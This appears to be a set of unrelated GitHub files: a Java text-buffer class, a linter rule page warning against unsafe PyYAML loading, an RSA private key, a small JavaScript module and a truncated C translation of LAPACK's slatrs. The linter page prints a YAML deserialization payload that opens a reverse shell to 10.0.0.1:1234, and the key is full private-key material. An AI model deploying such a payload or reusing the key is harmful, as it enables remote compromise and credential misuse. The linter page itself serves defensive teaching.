{
res.append( s );
if ( separatorsRequired-- > 0 )
{
res.append( myLineSeparator );
}
}
res.append( myLineSeparator );
}
else if ( to - from <= requiredLineNumber )
{
for ( int i = from; i < to; i++ )
{
res.append( srcLines[i] ).append( myLineSeparator );
}
// Pad with empty lines to reach the required count.
for ( int i = 0; i < requiredLineNumber - to + from; i++ )
{
res.append( myLineSeparator );
}
}
}
public int length( )
{
return myStringBuilder.length( );
}
public String substring( int start )
{
return myStringBuilder.substring( start );
}
// Drops the first |position| characters and shifts all offset marks left.
public TextBuffer setStart( int position )
{
myStringBuilder.delete( 0, position );
shiftMapping( 0, -position );
return this;
}
// Truncates the buffer and drops offset marks beyond the new length.
public void setLength( int position )
{
myStringBuilder.setLength( position );
if ( myLineToOffsetMapping != null )
{
HashMap<Integer, Integer> newMap = new HashMap<Integer, Integer>( );
for ( Map.Entry<Integer, Integer> entry : myLineToOffsetMapping.entrySet( ) )
{
if ( entry.getValue( ) <= position )
{
newMap.put( entry.getKey( ), entry.getValue( ) );
}
}
myLineToOffsetMapping = newMap;
}
}
// Appends another buffer, rebasing its offset marks onto this buffer's end.
public TextBuffer append( TextBuffer buffer )
{
if ( buffer.myLineToOffsetMapping != null
&& !buffer.myLineToOffsetMapping.isEmpty( ) )
{
checkMapCreated( );
for ( Map.Entry<Integer, Integer> entry : buffer.myLineToOffsetMapping.entrySet( ) )
{
myLineToOffsetMapping.put( entry.getKey( ), entry.getValue( )
+ myStringBuilder.length( ) );
}
}
myStringBuilder.append( buffer.myStringBuilder );
return this;
}
// Shifts every offset mark at or after |startOffset| by |shiftOffset|,
// dropping marks that would become negative.
private void shiftMapping( int startOffset, int shiftOffset )
{
if ( myLineToOffsetMapping != null )
{
HashMap<Integer, Integer> newMap = new HashMap<Integer, Integer>( );
for ( Map.Entry<Integer, Integer> entry : myLineToOffsetMapping.entrySet( ) )
{
int newValue = entry.getValue( );
if ( newValue >= startOffset )
{
newValue += shiftOffset;
}
if ( newValue >= 0 )
{
newMap.put( entry.getKey( ), newValue );
}
}
myLineToOffsetMapping = newMap;
}
}
// Lazily allocates the line-to-offset map.
private void checkMapCreated( )
{
if ( myLineToOffsetMapping == null )
{
myLineToOffsetMapping = new HashMap<Integer, Integer>( );
}
}
// Inserts text and shifts subsequent offset marks right by its length.
public TextBuffer insert( int offset, String s )
{
myStringBuilder.insert( offset, s );
shiftMapping( offset, s.length( ) );
return this;
}
public int countLines( )
{
return countLines( 0 );
}
public int countLines( int from )
{
return count( myLineSeparator, from );
}
// Counts non-overlapping occurrences of |substring| starting at |from|.
// NOTE(review): indexOf(...) > 0 means a match at offset 0 is not counted —
// confirm this is intentional before relying on exact counts.
public int count( String substring, int from )
{
int count = 0, length = substring.length( ), p = from;
while ( ( p = myStringBuilder.indexOf( substring, p ) ) > 0 )
{
++count;
p += length;
}
return count;
}
// Reduces |srcLines| toward |requiredLineNumber| lines by joining, first,
// lines that are a lone "{"/"}" into their predecessor, then blank lines.
// May still return more lines than requested if no more joins are possible.
private static List<String> compactLines( List<String> srcLines,
int requiredLineNumber )
{
if ( srcLines.size( ) < 2 || srcLines.size( ) <= requiredLineNumber )
{
return srcLines;
}
List<String> res = new LinkedList<String>( srcLines );
// first join lines with a single { or }
for ( int i = res.size( ) - 1; i > 0; i-- )
{
String s = res.get( i );
if ( s.trim( ).equals( "{" ) || s.trim( ).equals( "}" ) )
{
res.set( i - 1, res.get( i - 1 ).concat( s ) );
res.remove( i );
}
if ( res.size( ) <= requiredLineNumber )
{
return res;
}
}
// now join empty lines
for ( int i = res.size( ) - 1; i > 0; i-- )
{
String s = res.get( i );
if ( StringUtil.isEmpty( s.trim( ) ) )
{
res.set( i - 1, res.get( i - 1 ).concat( s ) );
res.remove( i );
}
if ( res.size( ) <= requiredLineNumber )
{
return res;
}
}
return res;
}
private Map<Integer, Set<Integer>> myLineMapping = null; // new to original
// Records original-source line numbers per output line. |lineMapping| is a
// flat array of (originalLine, newLine) pairs, keyed here by newLine.
public void dumpOriginalLineNumbers( int[] lineMapping )
{
if ( lineMapping.length > 0 )
{
myLineMapping = new HashMap<Integer, Set<Integer>>( );
for ( int i = 0; i < lineMapping.length; i += 2 )
{
int key = lineMapping[i + 1];
Set<Integer> existing = myLineMapping.get( key );
if ( existing == null )
{
existing = new TreeSet<Integer>( );
myLineMapping.put( key, existing );
}
existing.add( lineMapping[i] );
}
}
}
}
|
{
"pile_set_name": "Github"
}
|
# YML100
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().
The Pyyaml library's default loader will read any YAML attributes starting with `!!` as special syntax, including the `!!python/object/apply` command, which can execute any method in the standard library.
Because the standard library includes functions to starting local processes, using `yaml.load` against this input would execute local commands on the host shell.
## Deprecation in pyyaml 5.1
Wait, didn't pyyaml deprecate the unsafe loader?
Not really — newer versions of pyyaml (5.1) will raise a __warning__; however, in many situations, such as web servers, developers would never see this warning.
## Example
```python
import yaml
with open('cfg.yaml') as cfg:
config = yaml.load(cfg)
```
Any attackers payload could look something like this:
```yaml
!!python/object/apply:exec ['import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
```
When deserialized, this would start a shell on TCP 10.0.0.1:1234.
## Quick Fixes
* Plugin will recommend [Safe Load Fixer](../fixes/safeloadfixer.md).
## See Also
* [YAML Load Input Documentation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)
|
{
"pile_set_name": "Github"
}
|
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
|
{
"pile_set_name": "Github"
}
|
// AMD module: re-exports Array.prototype.slice (cached by the internal "arr"
// helper) so other modules can borrow it, e.g. to convert array-likes.
define( [
"./arr"
], function( arr ) {
"use strict";
return arr.slice;
} );
|
{
"pile_set_name": "Github"
}
|
/* slatrs.f -- translated by f2c (version 20061008).
You must link the resulting object file with libf2c:
on Microsoft Windows system, link with libf2c.lib;
on Linux or Unix systems, link with .../path/to/libf2c.a -lm
or, if you install libf2c.a in a standard place, with -lf2c -lm
-- in that order, at the end of the command line, as in
cc *.o -lf2c -lm
Source for libf2c is in /netlib/f2c/libf2c.zip, e.g.,
http://www.netlib.org/f2c/libf2c.zip
*/
#include "f2c.h"
#include "blaswrap.h"
/* Table of constant values */
static integer c__1 = 1;    /* unit stride argument passed by address to the BLAS calls */
static real c_b36 = .5f;    /* constant 0.5f used when halving x to prevent overflow */
/* Subroutine */ int slatrs_(char *uplo, char *trans, char *diag, char *
normin, integer *n, real *a, integer *lda, real *x, real *scale, real
*cnorm, integer *info)
{
/* SLATRS: solve A*x = s*b or A'*x = s*b for a triangular A, with the
scale factor s chosen to prevent overflow; full contract is in the
Purpose / Arguments comment block below. */
/* System generated locals */
integer a_dim1, a_offset, i__1, i__2, i__3;
real r__1, r__2, r__3;
/* Local variables */
integer i__, j;
real xj, rec, tjj;
integer jinc;
real xbnd;
integer imax;
real tmax, tjjs;
extern doublereal sdot_(integer *, real *, integer *, real *, integer *);
real xmax, grow, sumj;
extern logical lsame_(char *, char *);
extern /* Subroutine */ int sscal_(integer *, real *, real *, integer *);
real tscal, uscal;
integer jlast;
extern doublereal sasum_(integer *, real *, integer *);
logical upper;
extern /* Subroutine */ int saxpy_(integer *, real *, real *, integer *,
real *, integer *), strsv_(char *, char *, char *, integer *,
real *, integer *, real *, integer *);
extern doublereal slamch_(char *);
extern /* Subroutine */ int xerbla_(char *, integer *);
real bignum;
extern integer isamax_(integer *, real *, integer *);
logical notran;
integer jfirst;
real smlnum;
logical nounit;
/* -- LAPACK auxiliary routine (version 3.2) -- */
/* Univ. of Tennessee, Univ. of California Berkeley and NAG Ltd.. */
/* November 2006 */
/* .. Scalar Arguments .. */
/* .. */
/* .. Array Arguments .. */
/* .. */
/* Purpose */
/* ======= */
/* SLATRS solves one of the triangular systems */
/* A *x = s*b or A'*x = s*b */
/* with scaling to prevent overflow. Here A is an upper or lower */
/* triangular matrix, A' denotes the transpose of A, x and b are */
/* n-element vectors, and s is a scaling factor, usually less than */
/* or equal to 1, chosen so that the components of x will be less than */
/* the overflow threshold. If the unscaled problem will not cause */
/* overflow, the Level 2 BLAS routine STRSV is called. If the matrix A */
/* is singular (A(j,j) = 0 for some j), then s is set to 0 and a */
/* non-trivial solution to A*x = 0 is returned. */
/* Arguments */
/* ========= */
/* UPLO (input) CHARACTER*1 */
/* Specifies whether the matrix A is upper or lower triangular. */
/* = 'U': Upper triangular */
/* = 'L': Lower triangular */
/* TRANS (input) CHARACTER*1 */
/* Specifies the operation applied to A. */
/* = 'N': Solve A * x = s*b (No transpose) */
/* = 'T': Solve A'* x = s*b (Transpose) */
/* = 'C': Solve A'* x = s*b (Conjugate transpose = Transpose) */
/* DIAG (input) CHARACTER*1 */
/* Specifies whether or not the matrix A is unit triangular. */
/* = 'N': Non-unit triangular */
/* = 'U': Unit triangular */
/* NORMIN (input) CHARACTER*1 */
/* Specifies whether CNORM has been set or not. */
/* = 'Y': CNORM contains the column norms on entry */
/* = 'N': CNORM is not set on entry. On exit, the norms will */
/* be computed and stored in CNORM. */
/* N (input) INTEGER */
/* The order of the matrix A. N >= 0. */
/* A (input) REAL array, dimension (LDA,N) */
/* The triangular matrix A. If UPLO = 'U', the leading n by n */
/* upper triangular part of the array A contains the upper */
/* triangular matrix, and the strictly lower triangular part of */
/* A is not referenced. If UPLO = 'L', the leading n by n lower */
/* triangular part of the array A contains the lower triangular */
/* matrix, and the strictly upper triangular part of A is not */
/* referenced. If DIAG = 'U', the diagonal elements of A are */
/* also not referenced and are assumed to be 1. */
/* LDA (input) INTEGER */
/* The leading dimension of the array A. LDA >= max (1,N). */
/* X (input/output) REAL array, dimension (N) */
/* On entry, the right hand side b of the triangular system. */
/* On exit, X is overwritten by the solution vector x. */
/* SCALE (output) REAL */
/* The scaling factor s for the triangular system */
/* A * x = s*b or A'* x = s*b. */
/* If SCALE = 0, the matrix A is singular or badly scaled, and */
/* the vector x is an exact or approximate solution to A*x = 0. */
/* CNORM (input or output) REAL array, dimension (N) */
/* If NORMIN = 'Y', CNORM is an input argument and CNORM(j) */
/* contains the norm of the off-diagonal part of the j-th column */
/* of A. If TRANS = 'N', CNORM(j) must be greater than or equal */
/* to the infinity-norm, and if TRANS = 'T' or 'C', CNORM(j) */
/* must be greater than or equal to the 1-norm. */
/* If NORMIN = 'N', CNORM is an output argument and CNORM(j) */
/* returns the 1-norm of the offdiagonal part of the j-th column */
/* of A. */
/* INFO (output) INTEGER */
/* = 0: successful exit */
/* < 0: if INFO = -k, the k-th argument had an illegal value */
/* Further Details */
/* ======= ======= */
/* A rough bound on x is computed; if that is less than overflow, STRSV */
/* is called, otherwise, specific code is used which checks for possible */
/* overflow or divide-by-zero at every operation. */
/* A columnwise scheme is used for solving A*x = b. The basic algorithm */
/* if A is lower triangular is */
/* x[1:n] := b[1:n] */
/* for j = 1, ..., n */
/* x(j) := x(j) / A(j,j) */
/* x[j+1:n] := x[j+1:n] - x(j) * A[j+1:n,j] */
/* end */
/* Define bounds on the components of x after j iterations of the loop: */
/* M(j) = bound on x[1:j] */
/* G(j) = bound on x[j+1:n] */
/* Initially, let M(0) = 0 and G(0) = max{x(i), i=1,...,n}. */
/* Then for iteration j+1 we have */
/* M(j+1) <= G(j) / | A(j+1,j+1) | */
/* G(j+1) <= G(j) + M(j+1) * | A[j+2:n,j+1] | */
/* <= G(j) ( 1 + CNORM(j+1) / | A(j+1,j+1) | ) */
/* where CNORM(j+1) is greater than or equal to the infinity-norm of */
/* column j+1 of A, not counting the diagonal. Hence */
/* G(j) <= G(0) product ( 1 + CNORM(i) / | A(i,i) | ) */
/* 1<=i<=j */
/* and */
/* |x(j)| <= ( G(0) / |A(j,j)| ) product ( 1 + CNORM(i) / |A(i,i)| ) */
/* 1<=i< j */
/* Since |x(j)| <= M(j), we use the Level 2 BLAS routine STRSV if the */
/* reciprocal of the largest M(j), j=1,..,n, is larger than */
/* max(underflow, 1/overflow). */
/* The bound on x(j) is also used to determine when a step in the */
/* columnwise method can be performed without fear of overflow. If */
/* the computed bound is greater than a large constant, x is scaled to */
/* prevent overflow, but if the bound overflows, x is set to 0, x(j) to */
/* 1, and scale to 0, and a non-trivial solution to A*x = 0 is found. */
/* Similarly, a row-wise scheme is used to solve A'*x = b. The basic */
/* algorithm for A upper triangular is */
/* for j = 1, ..., n */
/* x(j) := ( b(j) - A[1:j-1,j]' * x[1:j-1] ) / A(j,j) */
/* end */
/* We simultaneously compute two bounds */
/* G(j) = bound on ( b(i) - A[1:i-1,i]' * x[1:i-1] ), 1<=i<=j */
/* M(j) = bound on x(i), 1<=i<=j */
/* The initial values are G(0) = 0, M(0) = max{b(i), i=1,..,n}, and we */
/* add the constraint G(j) >= G(j-1) and M(j) >= M(j-1) for j >= 1. */
/* Then the bound on x(j) is */
/* M(j) <= M(j-1) * ( 1 + CNORM(j) ) / | A(j,j) | */
/* <= M(0) * product ( ( 1 + CNORM(i) ) / |A(i,i)| ) */
/* 1<=i<=j */
/* and we can safely call STRSV if 1/M(n) and 1/G(n) are both greater */
/* than max(underflow, 1/overflow). */
/* ===================================================================== */
/* .. Parameters .. */
/* .. */
/* .. Local Scalars .. */
/* .. */
/* .. External Functions .. */
/* .. */
/* .. External Subroutines .. */
/* .. */
/* .. Intrinsic Functions .. */
/* .. */
/* .. Executable Statements .. */
/* Parameter adjustments */
/* Shift pointers so that 1-based Fortran indexing a[i + j*a_dim1],
x[j], cnorm[j] works directly on the C arrays. */
a_dim1 = *lda;
a_offset = 1 + a_dim1;
a -= a_offset;
--x;
--cnorm;
/* Function Body */
*info = 0;
upper = lsame_(uplo, "U");
notran = lsame_(trans, "N");
nounit = lsame_(diag, "N");
/* Test the input parameters. */
if (! upper && ! lsame_(uplo, "L")) {
*info = -1;
} else if (! notran && ! lsame_(trans, "T") && !
lsame_(trans, "C")) {
*info = -2;
} else if (! nounit && ! lsame_(diag, "U")) {
*info = -3;
} else if (! lsame_(normin, "Y") && ! lsame_(normin,
"N")) {
*info = -4;
} else if (*n < 0) {
*info = -5;
} else if (*lda < max(1,*n)) {
*info = -7;
}
if (*info != 0) {
i__1 = -(*info);
xerbla_("SLATRS", &i__1);
return 0;
}
/* Quick return if possible */
if (*n == 0) {
return 0;
}
/* Determine machine dependent parameters to control overflow. */
/* SMLNUM = safe_minimum / eps, BIGNUM = 1 / SMLNUM. */
smlnum = slamch_("Safe minimum") / slamch_("Precision");
bignum = 1.f / smlnum;
*scale = 1.f;
if (lsame_(normin, "N")) {
/* Compute the 1-norm of each column, not including the diagonal. */
if (upper) {
/* A is upper triangular. */
i__1 = *n;
for (j = 1; j <= i__1; ++j) {
i__2 = j - 1;
cnorm[j] = sasum_(&i__2, &a[j * a_dim1 + 1], &c__1);
/* L10: */
}
} else {
/* A is lower triangular. */
i__1 = *n - 1;
for (j = 1; j <= i__1; ++j) {
i__2 = *n - j;
cnorm[j] = sasum_(&i__2, &a[j + 1 + j * a_dim1], &c__1);
/* L20: */
}
cnorm[*n] = 0.f;
}
}
/* Scale the column norms by TSCAL if the maximum element in CNORM is */
/* greater than BIGNUM. */
imax = isamax_(n, &cnorm[1], &c__1);
tmax = cnorm[imax];
if (tmax <= bignum) {
tscal = 1.f;
} else {
tscal = 1.f / (smlnum * tmax);
sscal_(n, &tscal, &cnorm[1], &c__1);
}
/* Compute a bound on the computed solution vector to see if the */
/* Level 2 BLAS routine STRSV can be used. */
j = isamax_(n, &x[1], &c__1);
xmax = (r__1 = x[j], dabs(r__1));
xbnd = xmax;
if (notran) {
/* Compute the growth in A * x = b. */
if (upper) {
jfirst = *n;
jlast = 1;
jinc = -1;
} else {
jfirst = 1;
jlast = *n;
jinc = 1;
}
if (tscal != 1.f) {
grow = 0.f;
goto L50;
}
if (nounit) {
/* A is non-unit triangular. */
/* Compute GROW = 1/G(j) and XBND = 1/M(j). */
/* Initially, G(0) = max{x(i), i=1,...,n}. */
grow = 1.f / dmax(xbnd,smlnum);
xbnd = grow;
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L50;
}
/* M(j) = G(j-1) / abs(A(j,j)) */
tjj = (r__1 = a[j + j * a_dim1], dabs(r__1));
/* Computing MIN */
r__1 = xbnd, r__2 = dmin(1.f,tjj) * grow;
xbnd = dmin(r__1,r__2);
if (tjj + cnorm[j] >= smlnum) {
/* G(j) = G(j-1)*( 1 + CNORM(j) / abs(A(j,j)) ) */
grow *= tjj / (tjj + cnorm[j]);
} else {
/* G(j) could overflow, set GROW to 0. */
grow = 0.f;
}
/* L30: */
}
grow = xbnd;
} else {
/* A is unit triangular. */
/* Compute GROW = 1/G(j), where G(0) = max{x(i), i=1,...,n}. */
/* Computing MIN */
r__1 = 1.f, r__2 = 1.f / dmax(xbnd,smlnum);
grow = dmin(r__1,r__2);
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L50;
}
/* G(j) = G(j-1)*( 1 + CNORM(j) ) */
grow *= 1.f / (cnorm[j] + 1.f);
/* L40: */
}
}
L50:
;
} else {
/* Compute the growth in A' * x = b. */
if (upper) {
jfirst = 1;
jlast = *n;
jinc = 1;
} else {
jfirst = *n;
jlast = 1;
jinc = -1;
}
if (tscal != 1.f) {
grow = 0.f;
goto L80;
}
if (nounit) {
/* A is non-unit triangular. */
/* Compute GROW = 1/G(j) and XBND = 1/M(j). */
/* Initially, M(0) = max{x(i), i=1,...,n}. */
grow = 1.f / dmax(xbnd,smlnum);
xbnd = grow;
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L80;
}
/* G(j) = max( G(j-1), M(j-1)*( 1 + CNORM(j) ) ) */
xj = cnorm[j] + 1.f;
/* Computing MIN */
r__1 = grow, r__2 = xbnd / xj;
grow = dmin(r__1,r__2);
/* M(j) = M(j-1)*( 1 + CNORM(j) ) / abs(A(j,j)) */
tjj = (r__1 = a[j + j * a_dim1], dabs(r__1));
if (xj > tjj) {
xbnd *= tjj / xj;
}
/* L60: */
}
grow = dmin(grow,xbnd);
} else {
/* A is unit triangular. */
/* Compute GROW = 1/G(j), where G(0) = max{x(i), i=1,...,n}. */
/* Computing MIN */
r__1 = 1.f, r__2 = 1.f / dmax(xbnd,smlnum);
grow = dmin(r__1,r__2);
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L80;
}
/* G(j) = ( 1 + CNORM(j) )*G(j-1) */
xj = cnorm[j] + 1.f;
grow /= xj;
/* L70: */
}
}
L80:
;
}
if (grow * tscal > smlnum) {
/* Use the Level 2 BLAS solve if the reciprocal of the bound on */
/* elements of X is not too small. */
strsv_(uplo, trans, diag, n, &a[a_offset], lda, &x[1], &c__1);
} else {
/* Use a Level 1 BLAS solve, scaling intermediate results. */
if (xmax > bignum) {
/* Scale X so that its components are less than or equal to */
/* BIGNUM in absolute value. */
*scale = bignum / xmax;
sscal_(n, scale, &x[1], &c__1);
xmax = bignum;
}
if (notran) {
/* Solve A * x = b */
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Compute x(j) = b(j) / A(j,j), scaling x if necessary. */
xj = (r__1 = x[j], dabs(r__1));
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
/* Unit diagonal and no scaling: the division by A(j,j)
can be skipped entirely. */
if (tscal == 1.f) {
goto L95;
}
}
tjj = dabs(tjjs);
if (tjj > smlnum) {
/* abs(A(j,j)) > SMLNUM: */
if (tjj < 1.f) {
if (xj > tjj * bignum) {
/* Scale x by 1/b(j). */
rec = 1.f / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
x[j] /= tjjs;
xj = (r__1 = x[j], dabs(r__1));
} else if (tjj > 0.f) {
/* 0 < abs(A(j,j)) <= SMLNUM: */
if (xj > tjj * bignum) {
/* Scale x by (1/abs(x(j)))*abs(A(j,j))*BIGNUM */
/* to avoid overflow when dividing by A(j,j). */
rec = tjj * bignum / xj;
if (cnorm[j] > 1.f) {
/* Scale by 1/CNORM(j) to avoid overflow when */
/* multiplying x(j) times column j. */
rec /= cnorm[j];
}
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
x[j] /= tjjs;
xj = (r__1 = x[j], dabs(r__1));
} else {
/* A(j,j) = 0: Set x(1:n) = 0, x(j) = 1, and */
/* scale = 0, and compute a solution to A*x = 0. */
i__3 = *n;
for (i__ = 1; i__ <= i__3; ++i__) {
x[i__] = 0.f;
/* L90: */
}
x[j] = 1.f;
xj = 1.f;
*scale = 0.f;
xmax = 0.f;
}
L95:
/* Scale x if necessary to avoid overflow when adding a */
/* multiple of column j of A. */
if (xj > 1.f) {
rec = 1.f / xj;
if (cnorm[j] > (bignum - xmax) * rec) {
/* Scale x by 1/(2*abs(x(j))). */
rec *= .5f;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
}
} else if (xj * cnorm[j] > bignum - xmax) {
/* Scale x by 1/2. */
sscal_(n, &c_b36, &x[1], &c__1);
*scale *= .5f;
}
if (upper) {
if (j > 1) {
/* Compute the update */
/* x(1:j-1) := x(1:j-1) - x(j) * A(1:j-1,j) */
i__3 = j - 1;
r__1 = -x[j] * tscal;
saxpy_(&i__3, &r__1, &a[j * a_dim1 + 1], &c__1, &x[1],
&c__1);
i__3 = j - 1;
i__ = isamax_(&i__3, &x[1], &c__1);
xmax = (r__1 = x[i__], dabs(r__1));
}
} else {
if (j < *n) {
/* Compute the update */
/* x(j+1:n) := x(j+1:n) - x(j) * A(j+1:n,j) */
i__3 = *n - j;
r__1 = -x[j] * tscal;
saxpy_(&i__3, &r__1, &a[j + 1 + j * a_dim1], &c__1, &
x[j + 1], &c__1);
i__3 = *n - j;
i__ = j + isamax_(&i__3, &x[j + 1], &c__1);
xmax = (r__1 = x[i__], dabs(r__1));
}
}
/* L100: */
}
} else {
/* Solve A' * x = b */
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Compute x(j) = b(j) - sum A(k,j)*x(k). */
/* k<>j */
xj = (r__1 = x[j], dabs(r__1));
uscal = tscal;
rec = 1.f / dmax(xmax,1.f);
if (cnorm[j] > (bignum - xj) * rec) {
/* If x(j) could overflow, scale x by 1/(2*XMAX). */
rec *= .5f;
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
}
tjj = dabs(tjjs);
if (tjj > 1.f) {
/* Divide by A(j,j) when scaling x if A(j,j) > 1. */
/* Computing MIN */
r__1 = 1.f, r__2 = rec * tjj;
rec = dmin(r__1,r__2);
uscal /= tjjs;
}
if (rec < 1.f) {
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
sumj = 0.f;
if (uscal == 1.f) {
/* If the scaling needed for A in the dot product is 1, */
/* call SDOT to perform the dot product. */
if (upper) {
i__3 = j - 1;
